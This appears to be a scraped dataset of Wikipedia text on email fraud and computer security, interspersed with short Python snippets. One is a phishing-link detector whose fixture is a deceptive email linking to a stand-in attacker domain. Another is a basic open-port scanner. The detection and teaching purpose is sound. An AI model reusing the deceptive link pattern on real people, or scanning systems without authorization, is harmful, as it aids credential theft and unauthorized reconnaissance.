that the actual sender's name and the origin of the message are concealed or masked from the recipient. Many instances of email fraud use at least spoofing, and as most frauds are clearly criminal acts, criminals typically try to avoid easy traceability. Phishing is a type of social engineering where an attacker sends a fraudulent (e.g., spoofed, fake, or otherwise deceptive) message designed to trick a person into revealing sensitive information to the attacker 2 3 or to deploy malicious software on the victim's infrastructure, such as ransomware. Some spoof messages purport to be from an existing company, perhaps one with which the intended victim already has a business relationship. The 'bait' in this instance may appear to be a message from "the fraud department" of, for example, the victim's bank, which asks the customer to: "confirm their information"; "log in to their account"; "create a new password", or similar requests. Instead of being directed to the website they trust, they are referred to an identical-looking page with a different URL. After entering their log-in details, their username and password are visible to the perpetrators. In many cases, phishing emails can appear to be benign - for example, a message prompting the receiver that they have a new friend request on a social media platform. Regardless of how innocent the message is in itself, it will always lead the victim to an imitation web page and false log-in prompt. In a study, researchers concluded that cognitive reflection and sensation-seeking tendencies are modest but significant predictors of susceptibility to phishing. 4 Additionally, participants who were pressured to make quick email legitimacy judgments made more errors. 4 Email solicitations to purchase goods or services may be instances of attempted fraud. 
The fraudulent offer typically features a popular item or service, at a drastically reduced price. Items may be offered in advance of their actual availability. For instance, the latest video game may be offered prior to its release, but at a similar price to a normal sale. In this case, the "greed factor" is the desire to get something that nobody else has, and before everyone else can get it, rather than a reduction in price. Of course, the item is never delivered, as it was not a legitimate offer in the first place. Such an offer may even be no more than a phishing attempt to obtain the victim's credit card information, with the intent of using the information to fraudulently obtain goods or services, paid for by the hapless victim, who may not know they were scammed until their credit card has been "used up. The "request for help" type of email fraud takes this form: an email is sent requesting help in some way. However, a reward is included for this help, which acts as a "hook". The reward may be a large amount of money, a treasure, or some artifact of supposedly great value. This type of scam has existed at least since the Renaissance, known as the "Spanish Prisoner" or "Turkish Prisoner" scam. In its original form, this scheme has the con man purport to be in correspondence with a wealthy person who has been imprisoned under a false identity and is relying on the confidence artist to raise money to secure his release. The con man tells the "mark" (victim) that he is "allowed" to supply money, for which he should expect a generous reward when the prisoner returns. The confidence artist claims to have chosen the victim for their reputation for honesty. Due to the widespread use of web bugs in email, simply opening an email can potentially alert the sender that the address to which the email is sent is a valid address. This can also happen when the mail is 'reported' as spam, in some cases: if the email is forwarded for inspection, and opened, the sender will be notified in the same way as if the addressee opened it. Email fraud may be avoided by: Many frauds go unreported to authorities, due to feelings of shame, guilt, or embarrassment. |
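Row 343 above notes that phishing messages send victims to an identical-looking page at a different URL. A simple heuristic in the spirit of this notebook's tooling is to flag links in an HTML e-mail whose visible text names one domain while the underlying href points to another; the sample message below is invented for illustration.

# Flag anchors whose displayed URL and actual target disagree (a common phishing tell).
from bs4 import BeautifulSoup
from urllib.parse import urlparse

SAMPLE_EMAIL = '<p>Please verify your account at <a href="http://login.example-attacker.net/verify">https://www.mybank.com</a></p>'

def suspicious_links(html_body):
    soup = BeautifulSoup(html_body, "html5lib")
    flagged = []
    for a in soup.find_all("a", href=True):
        shown = a.get_text(strip=True)
        if shown.startswith(("http://", "https://")):
            shown_domain = urlparse(shown).netloc.lower()
            real_domain = urlparse(a["href"]).netloc.lower()
            if shown_domain and real_domain and shown_domain != real_domain:
                flagged.append((shown, a["href"]))  # display text and target disagree
    return flagged

print(suspicious_links(SAMPLE_EMAIL))
# [('https://www.mybank.com', 'http://login.example-attacker.net/verify')]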
344 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Computer_security | Computer security (also cybersecurity, digital security, or information technology (IT) security) is the protection of computer software, systems and networks from threats that may result in unauthorized information disclosure, theft of (or damage to) hardware, software, or data, as well as from the disruption or misdirection of the services they provide. 1 2 The field is significant due to the expanded reliance on computer systems, the Internet, 3 and wireless network standards. It is also significant due to the growth of smart devices, including smartphones, televisions, and the various devices that constitute the Internet of things (IoT). Cybersecurity is one of the most significant new challenges facing the contemporary world, due to both the complexity of information systems and the societies they support. Security is of especially high importance for systems that govern large-scale systems with far-reaching physical effects, such as power distribution, elections, and finance. 4 5 While many aspects of computer security involve digital security such as electronic passwords and encryption, physical security measures such as metal locks are still used to prevent unauthorized tampering. IT security is not a perfect subset of information security, thus does not fit completely into the security convergence schema. A vulnerability refers to a flaw in the structure, execution, functioning, or internal oversight of a computer or system that compromises its security. Most of the vulnerabilities that have been discovered are documented in the Common Vulnerabilities and Exposures (CVE) database. 6 An exploitable vulnerability is one for which at least one working attack or exploit exists. 7 Actors maliciously seeking vulnerabilities are known as threats. Vulnerabilities can be researched, reverse-engineered, hunted, or exploited using automated tools or customized scripts. 8 9 Various people or parties are vulnerable to cyber attacks; however, different groups are likely to experience different types of attacks more than others. 10 In April 2023, the United Kingdom Department for Science, Innovation Technology released a report on cyber attacks over the last 12 months. 11 They surveyed 2,263 UK businesses, 1,174 UK registered charities, and 554 education institutions. The research found that "32% of businesses and 24% of charities overall recall any breaches or attacks from the last 12 months. These figures were much higher for "medium businesses (59%), large businesses (69%), and high-income charities with 500,000 or more in annual income (56%). 11 Yet, although medium or large businesses are more often the victims, since larger companies have generally improved their security over the last decade, small and midsize businesses (SMBs) have also become increasingly vulnerable as they often "do not have advanced tools to defend the business. 10 SMBs are most likely to be affected by malware, ransomware, phishing, man-in-the-middle attacks, and Denial-of Service (DoS) Attacks. 10 Normal internet users are most likely to be affected by untargeted cyberattacks. 12 These are where attackers indiscriminately target as many devices, services, or users as possible. They do this using techniques that take advantage of the openness of the Internet. These strategies mostly include phishing, ransomware, water holing and scanning. 
12 To secure a computer system, it is important to understand the attacks that can be made against it, and these threats can typically be classified into one of the following categories: A backdoor in a computer system, a cryptosystem, or an algorithm is any secret method of bypassing normal authentication or security controls. These weaknesses may exist for many reasons, including original design or poor configuration. 13 Due to the nature of backdoors, they are of greater concern to companies and databases as opposed to individuals. Backdoors may be added by an authorized party to allow some legitimate access or by an attacker for malicious reasons. Criminals often use malware to install backdoors, giving them remote administrative access to a system. 14 Once they have access, cybercriminals can "modify files, steal personal information, install unwanted software, and even take control of the entire computer. 14 Backdoors can be very hard to detect and are usually discovered by someone who has access to the application source code or intimate knowledge of the operating system of the computer. Denial-of-service attacks (DoS) are designed to make a machine or network resource unavailable to its intended users. 15 Attackers can deny service to individual victims, such as by deliberately entering a wrong password enough consecutive times to cause the victim's account to be locked, or they may overload the capabilities of a machine or network and block all users at once. While a network attack from a single IP address can be blocked by adding a new firewall rule, many forms of distributed denial-of-service (DDoS) attacks are possible, where the attack comes from a large number of points. In this case, defending against these attacks is much more difficult. Such attacks can originate from the zombie computers of a botnet or from a range of other possible techniques, including distributed reflective denial-of-service (DRDoS), where innocent systems are fooled into sending traffic to the victim. 15 With such attacks, the amplification factor makes the attack easier for the attacker because they have to use little bandwidth themselves. To understand why attackers may carry out these attacks, see the 'attacker motivation' section. A direct-access attack is when an unauthorized user (an attacker) gains physical access to a computer, most likely to directly copy data from it or steal information. 16 Attackers may also compromise security by making operating system modifications, installing software worms, keyloggers, covert listening devices or using wireless microphones. Even when the system is protected by standard security measures, these may be bypassed by booting another operating system or tool from a CD-ROM or other bootable media. Disk encryption and the Trusted Platform Module standard are designed to prevent these attacks. Direct service attackers are related in concept to direct memory attacks which allow an attacker to gain direct access to a computer's memory. 17 The attacks "take advantage of a feature of modern computers that allows certain devices, such as external hard drives, graphics cards, or network cards, to access the computer's memory directly. 17 Eavesdropping is the act of surreptitiously listening to a private computer conversation (communication), usually between hosts on a network. 
It typically occurs when a user connects to a network where traffic is not secured or encrypted and sends sensitive business data to a colleague, which, when listened to by an attacker, could be exploited. 18 Data transmitted across an "open network" allows an attacker to exploit a vulnerability and intercept it via various methods. Unlike malware, direct-access attacks, or other forms of cyber attacks, eavesdropping attacks are unlikely to negatively affect the performance of networks or devices, making them difficult to notice. 18 In fact, "the attacker does not need to have any ongoing connection to the software at all. The attacker can insert the software onto a compromised device, perhaps by direct insertion or perhaps by a virus or other malware, and then come back some time later to retrieve any data that is found or trigger the software to send the data at some determined time. 19 Using a virtual private network (VPN), which encrypts data between two points, is one of the most common forms of protection against eavesdropping. Using the best form of encryption possible for wireless networks is best practice, as well as using HTTPS instead of an unencrypted HTTP. 20 Programs such as Carnivore and NarusInSight have been used by the Federal Bureau of Investigation (FBI) and NSA to eavesdrop on the systems of internet service providers. Even machines that operate as a closed system (i.e., with no contact with the outside world) can be eavesdropped upon by monitoring the faint electromagnetic transmissions generated by the hardware. TEMPEST is a specification by the NSA referring to these attacks. Malicious software (malware) is any software code or computer program "intentionally written to harm a computer system or its users. 21 Once present on a computer, it can leak sensitive details such as personal information, business information and passwords, can give control of the system to the attacker, and can corrupt or delete data permanently. 22 Another type of malware is ransomware, which is when "malware installs itself onto a victim's machine, encrypts their files, and then turns around and demands a ransom (usually in Bitcoin) to return that data to the user. 23 Types of malware include some of the following: Man-in-the-middle attacks (MITM) involve a malicious attacker trying to intercept, surveil or modify communications between two parties by spoofing one or both party's identities and injecting themselves in-between. 24 Types of MITM attacks include: Surfacing in 2017, a new class of multi-vector, 25 polymorphic 26 cyber threats combine several types of attacks and change form to avoid cybersecurity controls as they spread. Multi-vector polymorphic attacks, as the name describes, are both multi-vectored and polymorphic. 27 Firstly, they are a singular attack that involves multiple methods of attack. In this sense, they are “multi-vectored (i.e. the attack can use multiple means of propagation such as via the Web, email and applications. However, they are also multi-staged, meaning that “they can infiltrate networks and move laterally inside the network. 27 The attacks can be polymorphic, meaning that the cyberattacks used such as viruses, worms or trojans “constantly change (“morph”) making it nearly impossible to detect them using signature-based defences. 27 Phishing is the attempt of acquiring sensitive information such as usernames, passwords, and credit card details directly from users by deceiving the users. 
28 Phishing is typically carried out by email spoofing, instant messaging, text message, or on a phone call. They often direct users to enter details at a fake website whose look and feel are almost identical to the legitimate one. 29 The fake website often asks for personal information, such as login details and passwords. This information can then be used to gain access to the individual's real account on the real website. Preying on a victim's trust, phishing can be classified as a form of social engineering. Attackers can use creative ways to gain access to real accounts. A common scam is for attackers to send fake electronic invoices 30 to individuals showing that they recently purchased music, apps, or others, and instructing them to click on a link if the purchases were not authorized. A more strategic type of phishing is spear-phishing which leverages personal or organization-specific details to make the attacker appear like a trusted source. Spear-phishing attacks target specific individuals, rather than the broad net cast by phishing attempts. 31 Privilege escalation describes a situation where an attacker with some level of restricted access is able to, without authorization, elevate their privileges or access level. 32 For example, a standard computer user may be able to exploit a vulnerability in the system to gain access to restricted data; or even become root and have full unrestricted access to a system. The severity of attacks can range from attacks simply sending an unsolicited email to a ransomware attack on large amounts of data. Privilege escalation usually starts with social engineering techniques, often phishing. 32 Privilege escalation can be separated into two strategies, horizontal and vertical privilege escalation: Any computational system affects its environment in some form. This effect it has on its environment can range from electromagnetic radiation, to residual effect on RAM cells which as a consequence make a Cold boot attack possible, to hardware implementation faults that allow for access and or guessing of other values that normally should be inaccessible. In Side-channel attack scenarios, the attacker would gather such information about a system or network to guess its internal state and as a result access the information which is assumed by the victim to be secure. Social engineering, in the context of computer security, aims to convince a user to disclose secrets such as passwords, card numbers, etc. or grant physical access by, for example, impersonating a senior executive, bank, a contractor, or a customer. 33 This generally involves exploiting people's trust, and relying on their cognitive biases. A common scam involves emails sent to accounting and finance department personnel, impersonating their CEO and urgently requesting some action. One of the main techniques of social engineering are phishing attacks. In early 2016, the FBI reported that such business email compromise (BEC) scams had cost US businesses more than $2 billion in about two years. 34 In May 2016, the Milwaukee Bucks NBA team was the victim of this type of cyber scam with a perpetrator impersonating the team's president Peter Feigin, resulting in the handover of all the team's employees' 2015 W 2 tax forms. 35 Spoofing is an act of pretending to be a valid entity through the falsification of data (such as an IP address or username), in order to gain access to information or resources that one is otherwise unauthorized to obtain. Spoofing is closely related to phishing. 
36 37 There are several types of spoofing, including: In 2018, the cybersecurity firm Trellix published research on the life-threatening risk of spoofing in the healthcare industry. 39 Tampering describes a malicious modification or alteration of data. It is an intentional but unauthorized act resulting in the modification of a system, components of systems, its intended behavior, or data. So-called Evil Maid attacks and security services planting of surveillance capability into routers are examples. 40 HTML smuggling allows an attacker to "smuggle" a malicious code inside a particular HTML or web page. 41 HTML files can carry payloads concealed as benign, inert data in order to defeat content filters. These payloads can be reconstructed on the other side of the filter. 42 When a target user opens the HTML, the malicious code is activated; the web browser then "decodes" the script, which then unleashes the malware onto the target's device. 41 Employee behavior can have a big impact on information security in organizations. Cultural concepts can help different segments of the organization work effectively or work against effectiveness toward information security within an organization. Information security culture is the ...totality of patterns of behavior in an organization that contributes to the protection of information of all kinds. 43 Andersson and Reimers (2014) found that employees often do not see themselves as part of their organization's information security effort and often take actions that impede organizational changes. 44 Indeed, the Verizon Data Breach Investigations Report 2020, which examined 3,950 security breaches, discovered 30% of cybersecurity incidents involved internal actors within a company. 45 Research shows information security culture needs to be improved continuously. In "Information Security Culture from Analysis to Change", authors commented, "It's a never-ending process, a cycle of evaluation and change or maintenance. To manage the information security culture, five steps should be taken: pre-evaluation, strategic planning, operative planning, implementation, and post-evaluation. 46 In computer security, a countermeasure is an action, device, procedure or technique that reduces a threat, a vulnerability, or an attack by eliminating or preventing it, by minimizing the harm it can cause, or by discovering and reporting it so that corrective action can be taken. 47 48 49 Some common countermeasures are listed in the following sections: Security by design, or alternately secure by design, means that the software has been designed from the ground up to be secure. In this case, security is considered a main feature. The UK government's National Cyber Security Centre separates secure cyber design principles into five sections: 50 These design principles of security by design can include some of the following techniques: Security architecture can be defined as the "practice of designing computer systems to achieve security goals. 51 These goals have overlap with the principles of "security by design" explored above, including to "make initial compromise of the system difficult, and to "limit the impact of any compromise. 51 In practice, the role of a security architect would be to ensure the structure of a system reinforces the security of the system, and that new changes are safe and meet the security requirements of the organization. 
52 53 Similarly, Techopedia defines security architecture as "a unified security design that addresses the necessities and potential risks involved in a certain scenario or environment. It also specifies when and where to apply security controls. The design process is generally reproducible. The key attributes of security architecture are: 54 Practicing security architecture provides the right foundation to systematically address business, IT and security concerns in an organization. A state of computer security is the conceptual ideal, attained by the use of three processes: threat prevention, detection, and response. These processes are based on various policies and system components, which include the following: Today, computer security consists mainly of preventive measures, like firewalls or an exit procedure. A firewall can be defined as a way of filtering network data between a host or a network and another network, such as the Internet. They can be implemented as software running on the machine, hooking into the network stack (or, in the case of most UNIX-based operating systems such as Linux, built into the operating system kernel) to provide real-time filtering and blocking. 55 Another implementation is a so-called physical firewall, which consists of a separate machine filtering network traffic. Firewalls are common amongst machines that are permanently connected to the Internet. Some organizations are turning to big data platforms, such as Apache Hadoop, to extend data accessibility and machine learning to detect advanced persistent threats. 57 In order to ensure adequate security, the confidentiality, integrity and availability of a network, better known as the CIA triad, must be protected and is considered the foundation to information security. 58 To achieve those objectives, administrative, physical and technical security measures should be employed. The amount of security afforded to an asset can only be determined when its value is known. 59 Vulnerability management is the cycle of identifying, fixing or mitigating vulnerabilities, 60 especially in software and firmware. Vulnerability management is integral to computer security and network security. Vulnerabilities can be discovered with a vulnerability scanner, which analyzes a computer system in search of known vulnerabilities, 61 such as open ports, insecure software configuration, and susceptibility to malware. In order for these tools to be effective, they must be kept up to date with every new update the vendor release. Typically, these updates will scan for the new vulnerabilities that were introduced recently. Beyond vulnerability scanning, many organizations contract outside security auditors to run regular penetration tests against their systems to identify vulnerabilities. In some sectors, this is a contractual requirement. 62 The act of assessing and reducing vulnerabilities to cyber attacks is commonly referred to as information technology security assessments. They aim to assess systems for risk and to predict and test for their vulnerabilities. While formal verification of the correctness of computer systems is possible, 63 64 it is not yet common. Operating systems formally verified include seL4, 65 and SYSGO's PikeOS 66 67 but these make up a very small percentage of the market. It is possible to reduce an attacker's chances by keeping systems up to date with security patches and updates and or hiring people with expertise in security. 
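As a small illustration of one item a vulnerability scanner looks for, as mentioned above, the sketch below checks a host for open TCP ports with the standard socket module. The host and port list are placeholders, and such checks should only ever be run against systems you are authorized to test.

# Minimal open-port check: attempt a TCP connection to each port and record successes.
import socket

def open_ports(host="127.0.0.1", ports=(22, 80, 443, 3306, 8080)):
    found = []
    for port in ports:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
            sock.settimeout(0.5)
            if sock.connect_ex((host, port)) == 0:  # 0 means the connection succeeded
                found.append(port)
    return found

# Example usage:
# print(open_ports())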
Large companies with significant threats can hire Security Operations Centre (SOC) Analysts. These are specialists in cyber defences, with their role ranging from "conducting threat analysis to investigating reports of any new issues and preparing and testing disaster recovery plans. 68 Whilst no measures can completely guarantee the prevention of an attack, these measures can help mitigate the damage of possible attacks. The effects of data loss damage can be also reduced by careful backing up and insurance. Outside of formal assessments, there are various methods of reducing vulnerabilities. Two factor authentication is a method for mitigating unauthorized access to a system or sensitive information. 69 It requires something you know: a password or PIN, and something you have: a card, dongle, cellphone, or another piece of hardware. This increases security as an unauthorized person needs both of these to gain access. Protecting against social engineering and direct computer access (physical) attacks can only happen by non-computer means, which can be difficult to enforce, relative to the sensitivity of the information. Training is often involved to help mitigate this risk by improving people's knowledge of how to protect themselves and by increasing people's awareness of threats. 70 However, even in highly disciplined environments (e.g. military organizations), social engineering attacks can still be difficult to foresee and prevent. Inoculation, derived from inoculation theory, seeks to prevent social engineering and other fraudulent tricks and traps by instilling a resistance to persuasion attempts through exposure to similar or related attempts. 71 Hardware-based or assisted computer security also offers an alternative to software-only computer security. Using devices and methods such as dongles, trusted platform modules, intrusion-aware cases, drive locks, disabling USB ports, and mobile-enabled access may be considered more secure due to the physical access (or sophisticated backdoor access) required in order to be compromised. Each of these is covered in more detail below. One use of the term computer security refers to technology that is used to implement secure operating systems. Using secure operating systems is a good way of ensuring computer security. These are systems that have achieved certification from an external security-auditing organization, the most popular evaluations are Common Criteria (CC). 85 In software engineering, secure coding aims to guard against the accidental introduction of security vulnerabilities. It is also possible to create software designed from the ground up to be secure. Such systems are secure by design. Beyond this, formal verification aims to prove the correctness of the algorithms underlying a system; 86 important for cryptographic protocols for example. Within computer systems, two of the main security models capable of enforcing privilege separation are access control lists (ACLs) and role-based access control (RBAC). An access-control list (ACL), with respect to a computer file system, is a list of permissions associated with an object. An ACL specifies which users or system processes are granted access to objects, as well as what operations are allowed on given objects. Role-based access control is an approach to restricting system access to authorized users, 87 88 89 used by the majority of enterprises with more than 500 employees, 90 and can implement mandatory access control (MAC) or discretionary access control (DAC). 
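The role-based access control model described just above reduces to a very small sketch: permissions attach to roles, and a user's effective permissions are the union of the permissions of their roles. The role, user, and permission names below are invented for illustration.

# RBAC sketch: users acquire permissions only through the roles assigned to them.
ROLE_PERMISSIONS = {
    "admin":  {"read", "write", "delete", "manage_users"},
    "editor": {"read", "write"},
    "viewer": {"read"},
}

USER_ROLES = {
    "alice": {"admin"},
    "bob":   {"editor", "viewer"},
}

def has_permission(user, permission):
    roles = USER_ROLES.get(user, set())
    return any(permission in ROLE_PERMISSIONS.get(role, set()) for role in roles)

print(has_permission("bob", "write"))   # True  (granted via the editor role)
print(has_permission("bob", "delete"))  # False (no assigned role grants delete)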
A further approach, capability-based security has been mostly restricted to research operating systems. Capabilities can, however, also be implemented at the language level, leading to a style of programming that is essentially a refinement of standard object-oriented design. An open-source project in the area is the E language. The end-user is widely recognized as the weakest link in the security chain 91 and it is estimated that more than 90% of security incidents and breaches involve some kind of human error. 92 93 Among the most commonly recorded forms of errors and misjudgment are poor password management, sending emails containing sensitive data and attachments to the wrong recipient, the inability to recognize misleading URLs and to identify fake websites and dangerous email attachments. A common mistake that users make is saving their user id password in their browsers to make it easier to log in to banking sites. This is a gift to attackers who have obtained access to a machine by some means. The risk may be mitigated by the use of two-factor authentication. 94 As the human component of cyber risk is particularly relevant in determining the global cyber risk 95 an organization is facing, security awareness training, at all levels, not only provides formal compliance with regulatory and industry mandates but is considered essential 96 in reducing cyber risk and protecting individuals and companies from the great majority of cyber threats. The focus on the end-user represents a profound cultural change for many security practitioners, who have traditionally approached cybersecurity exclusively from a technical perspective, and moves along the lines suggested by major security centers 97 to develop a culture of cyber awareness within the organization, recognizing that a security-aware user provides an important line of defense against cyber attacks. Related to end-user training, digital hygiene or cyber hygiene is a fundamental principle relating to information security and, as the analogy with personal hygiene shows, is the equivalent of establishing simple routine measures to minimize the risks from cyber threats. The assumption is that good cyber hygiene practices can give networked users another layer of protection, reducing the risk that one vulnerable node will be used to either mount attacks or compromise another node or network, especially from common cyberattacks. 98 Cyber hygiene should also not be mistaken for proactive cyber defence, a military term. 99 The most common acts of digital hygiene can include updating malware protection, cloud back-ups, passwords, and ensuring restricted admin rights and network firewalls. 100 As opposed to a purely technology-based defense against threats, cyber hygiene mostly regards routine measures that are technically simple to implement and mostly dependent on discipline 101 or education. 102 It can be thought of as an abstract list of tips or measures that have been demonstrated as having a positive effect on personal and or collective digital security. As such, these measures can be performed by laypeople, not just security experts. Cyber hygiene relates to personal hygiene as computer viruses relate to biological viruses (or pathogens). However, while the term computer virus was coined almost simultaneously with the creation of the first working computer viruses, 103 the term cyber hygiene is a much later invention, perhaps as late as 2000 104 by Internet pioneer Vint Cerf. 
It has since been adopted by the Congress 105 and Senate of the United States, 106 the FBI, 107 EU institutions 98 and heads of state. 99 Responding to attempted security breaches is often very difficult for a variety of reasons, including: Where an attack succeeds and a breach occurs, many jurisdictions now have in place mandatory security breach notification laws. The growth in the number of computer systems and the increasing reliance upon them by individuals, businesses, industries, and governments means that there are an increasing number of systems at risk. The computer systems of financial regulators and financial institutions like the U.S. Securities and Exchange Commission, SWIFT, investment banks, and commercial banks are prominent hacking targets for cybercriminals interested in manipulating markets and making illicit gains. 108 Websites and apps that accept or store credit card numbers, brokerage accounts, and bank account information are also prominent hacking targets, because of the potential for immediate financial gain from transferring money, making purchases, or selling the information on the black market. 109 In-store payment systems and ATMs have also been tampered with in order to gather customer account data and PINs. The UCLA Internet Report: Surveying the Digital Future (2000) found that the privacy of personal data created barriers to online sales and that more than nine out of 10 internet users were somewhat or very concerned about credit card security. 110 The most common web technologies for improving security between browsers and websites are named SSL (Secure Sockets Layer), and its successor TLS (Transport Layer Security), identity management and authentication services, and domain name services allow companies and consumers to engage in secure communications and commerce. Several versions of SSL and TLS are commonly used today in applications such as web browsing, e-mail, internet faxing, instant messaging, and VoIP (voice-over-IP). There are various interoperable implementations of these technologies, including at least one implementation that is open source. Open source allows anyone to view the application's source code, and look for and report vulnerabilities. The credit card companies Visa and MasterCard cooperated to develop the secure EMV chip which is embedded in credit cards. Further developments include the Chip Authentication Program where banks give customers hand-held card readers to perform online secure transactions. Other developments in this arena include the development of technology such as Instant Issuance which has enabled shopping mall kiosks acting on behalf of banks to issue on-the-spot credit cards to interested customers. Computers control functions at many utilities, including coordination of telecommunications, the power grid, nuclear power plants, and valve opening and closing in water and gas networks. The Internet is a potential attack vector for such machines if connected, but the Stuxnet worm demonstrated that even equipment controlled by computers not connected to the Internet can be vulnerable. In 2014, the Computer Emergency Readiness Team, a division of the Department of Homeland Security, investigated 79 hacking incidents at energy companies. 111 The aviation industry is very reliant on a series of complex systems which could be attacked. 
112 A simple power outage at one airport can cause repercussions worldwide, 113 much of the system relies on radio transmissions which could be disrupted, 114 and controlling aircraft over oceans is especially dangerous because radar surveillance only extends 175 to 225 miles offshore. 115 There is also potential for attack from within an aircraft. 116 Implementing fixes in aerospace systems poses a unique challenge because efficient air transportation is heavily affected by weight and volume. Improving security by adding physical devices to airplanes could increase their unloaded weight, and could potentially reduce cargo or passenger capacity. 117 In Europe, with the Pan-European Network Service 118 and NewPENS, 119 and in the US with the NextGen program, 120 air navigation service providers are moving to create their own dedicated networks. Many modern passports are now biometric passports, containing an embedded microchip that stores a digitized photograph and personal information such as name, gender, and date of birth. In addition, more countries are introducing facial recognition technology to reduce identity-related fraud. The introduction of the ePassport has assisted border officials in verifying the identity of the passport holder, thus allowing for quick passenger processing. 121 Plans are under way in the US, the UK, and Australia to introduce SmartGate kiosks with both retina and fingerprint recognition technology. 122 The airline industry is moving from the use of traditional paper tickets towards the use of electronic tickets (e-tickets). These have been made possible by advances in online credit card transactions in partnership with the airlines. Long-distance bus companies are also switching over to e-ticketing transactions today. The consequences of a successful attack range from loss of confidentiality to loss of system integrity, air traffic control outages, loss of aircraft, and even loss of life. Desktop computers and laptops are commonly targeted to gather passwords or financial account information or to construct a botnet to attack another target. Smartphones, tablet computers, smart watches, and other mobile devices such as quantified self devices like activity trackers have sensors such as cameras, microphones, GPS receivers, compasses, and accelerometers which could be exploited, and may collect personal information, including sensitive health information. WiFi, Bluetooth, and cell phone networks on any of these devices could be used as attack vectors, and sensors might be remotely activated after a successful breach. 123 The increasing number of home automation devices such as the Nest thermostat are also potential targets. 123 Today many healthcare providers and health insurance companies use the internet to provide enhanced products and services, for example through use of tele-health to potentially offer better quality and access to healthcare, or fitness trackers to lower insurance premiums. The health care company Humana partners with WebMD, Oracle Corporation, EDS and Microsoft to enable its members to access their health care records, as well as to provide an overview of health care plans. 124 Patient records are increasingly being placed on secure in-house networks, alleviating the need for extra storage space. 125 Large corporations are common targets. In many cases attacks are aimed at financial gain through identity theft and involve data breaches.
Examples include the loss of millions of clients' credit card and financial details by Home Depot, 126 Staples, 127 Target Corporation, 128 and Equifax. 129 Medical records have been targeted in general identity theft, health insurance fraud, and impersonating patients to obtain prescription drugs for recreational purposes or resale. 130 Although cyber threats continue to increase, 62% of all organizations did not increase security training for their business in 2015. 131 Not all attacks are financially motivated, however: security firm HBGary Federal suffered a series of serious attacks in 2011 from the hacktivist group Anonymous in retaliation for the firm's CEO claiming to have infiltrated their group, 132 133 and Sony Pictures was hacked in 2014 with the apparent dual motive of embarrassing the company through data leaks and crippling the company by wiping workstations and servers. 134 135 Vehicles are increasingly computerized, with engine timing, cruise control, anti-lock brakes, seat belt tensioners, door locks, airbags and advanced driver-assistance systems on many models. Additionally, connected cars may use WiFi and Bluetooth to communicate with onboard consumer devices and the cell phone network. 136 Self-driving cars are expected to be even more complex. All of these systems carry some security risks, and such issues have gained wide attention. 137 138 139 Simple examples of risk include a malicious compact disc being used as an attack vector, 140 and the car's onboard microphones being used for eavesdropping. However, if access is gained to a car's internal controller area network, the danger is much greater 136 and in a widely publicized 2015 test, hackers remotely carjacked a vehicle from 10 miles away and drove it into a ditch. 141 142 Manufacturers are reacting in numerous ways, with Tesla in 2016 pushing out some security fixes over the air into its cars' computer systems. 143 In the area of autonomous vehicles, in September 2016 the United States Department of Transportation announced some initial safety standards, and called for states to come up with uniform policies. 144 145 146 Additionally, e-Drivers' licenses are being developed using the same technology. For example, Mexico's licensing authority (ICV) has used a smart card platform to issue the first e-Drivers' licenses to the city of Monterrey, in the state of Nuevo León. 147 Shipping companies 148 have adopted RFID (Radio Frequency Identification) technology as an efficient, digitally secure, tracking device. Unlike a barcode, RFID can be read up to 20 feet away. RFID is used by FedEx 149 and UPS. 150 Government and military computer systems are commonly attacked by activists 151 152 153 and foreign powers, 154 155 156 157 as is local and regional government infrastructure such as traffic light controls, police and intelligence agency communications, personnel records, and student records. 158 The FBI, CIA, and Pentagon all utilize secure controlled access technology for their buildings. However, the use of this form of technology is spreading into the entrepreneurial world. More and more companies are taking advantage of the development of digitally secure controlled access technology. GE's ACUVision, for example, offers a single panel platform for access control, alarm monitoring and digital recording.
159 The Internet of things (IoT) is the network of physical objects such as devices, vehicles, and buildings that are embedded with electronics, software, sensors, and network connectivity that enables them to collect and exchange data. 160 Concerns have been raised that this is being developed without appropriate consideration of the security challenges involved. 161 162 While the IoT creates opportunities for more direct integration of the physical world into computer-based systems, 163 164 it also provides opportunities for misuse. In particular, as the Internet of Things spreads widely, cyberattacks are likely to become an increasingly physical (rather than simply virtual) threat. 165 If a front door's lock is connected to the Internet, and can be locked unlocked from a phone, then a criminal could enter the home at the press of a button from a stolen or hacked phone. People could stand to lose much more than their credit card numbers in a world controlled by IoT-enabled devices. Thieves have also used electronic means to circumvent non-Internet-connected hotel door locks. 166 An attack aimed at physical infrastructure and or human lives is often called a cyber-kinetic attack. As IoT devices and appliances become more widespread, the prevalence and potential damage of cyber-kinetic attacks can increase substantially. Medical devices have either been successfully attacked or had potentially deadly vulnerabilities demonstrated, including both in-hospital diagnostic equipment 167 and implanted devices including pacemakers 168 and insulin pumps. 169 There are many reports of hospitals and hospital organizations getting hacked, including ransomware attacks, 170 171 172 173 Windows XP exploits, 174 175 viruses, 176 177 and data breaches of sensitive data stored on hospital servers. 178 171 179 180 On 28 December 2016 the US Food and Drug Administration released its recommendations for how medical device manufacturers should maintain the security of Internet-connected devices but no structure for enforcement. 181 182 In distributed generation systems, the risk of a cyber attack is real, according to Daily Energy Insider. An attack could cause a loss of power in a large area for a long period of time, and such an attack could have just as severe consequences as a natural disaster. The District of Columbia is considering creating a Distributed Energy Resources (DER) Authority within the city, with the goal being for customers to have more insight into their own energy use and giving the local electric utility, Pepco, the chance to better estimate energy demand. The D.C. proposal, however, would "allow third-party vendors to create numerous points of energy distribution, which could potentially create more opportunities for cyber attackers to threaten the electric grid. 183 Perhaps the most widely known digitally secure telecommunication device is the SIM (Subscriber Identity Module) card, a device that is embedded in most of the world's cellular devices before any service can be obtained. The SIM card is just the beginning of this digitally secure environment. The Smart Card Web Servers draft standard (SCWS) defines the interfaces to an HTTP server in a smart card. 184 Tests are being conducted to secure OTA ("over-the-air") payment and credit card information from and to a mobile phone. Combination SIM DVD devices are being developed through Smart Video Card technology which embeds a DVD-compliant optical disc into the card body of a regular SIM card. 
